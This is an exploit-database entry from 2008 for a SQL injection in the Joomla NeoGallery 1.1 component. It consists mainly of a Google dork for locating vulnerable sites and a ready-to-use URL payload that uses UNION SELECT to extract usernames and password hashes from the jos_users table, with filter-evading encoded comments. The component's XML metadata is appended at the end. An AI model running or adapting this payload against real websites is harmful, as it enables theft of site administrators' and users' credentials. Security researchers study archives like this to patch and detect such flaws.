[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component NeoGallery 1.1 SQL Injection Vulnerability
# Published : 2008-02-08
# Author : S@BUN
# Previous Title : PowerNews (Newsscript) 2.5.6 Local File Inclusion Vulnerabilities
# Next Title : Mambo Component com_gallery Remote SQL Injection Vulnerability
#########################################################################
#
# joomla SQL Injection(com_neogallery)
#
#########################################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.milw0rm.com/author/1334
#
# MA?°L : www.milw0rm.com@gmail.com
#
#########################################################################
#
# DORK 1 : allinurl:"com_neogallery"
#
##########################################################################
EXPLOIT :
index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users
#########################################################################
# S@BUN i AM NOT HACKER S@BUN
#########################################################################
# S@BUN http://www.milw0rm.com S@BUN
#########################################################################
# THANKS STROKE
#########################################################################
<name>NeoGallery</name>
<creationDate>Septembre 2006</creationDate>
<author>Nicolas Cornet - Neoweb</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>nicolas@neoweb.fr</authorEmail>
<authorUrl>www.neoweb.fr</authorUrl>
<version>1.1</version>
<description><![CDATA[Ce composant vous permet d'afficher une galerie de photos, organisees en categories, sur votre site.<br />Realise par Nicolas Cornet - Neoweb.]]></description>
# www.Syue.com [2008-02-08]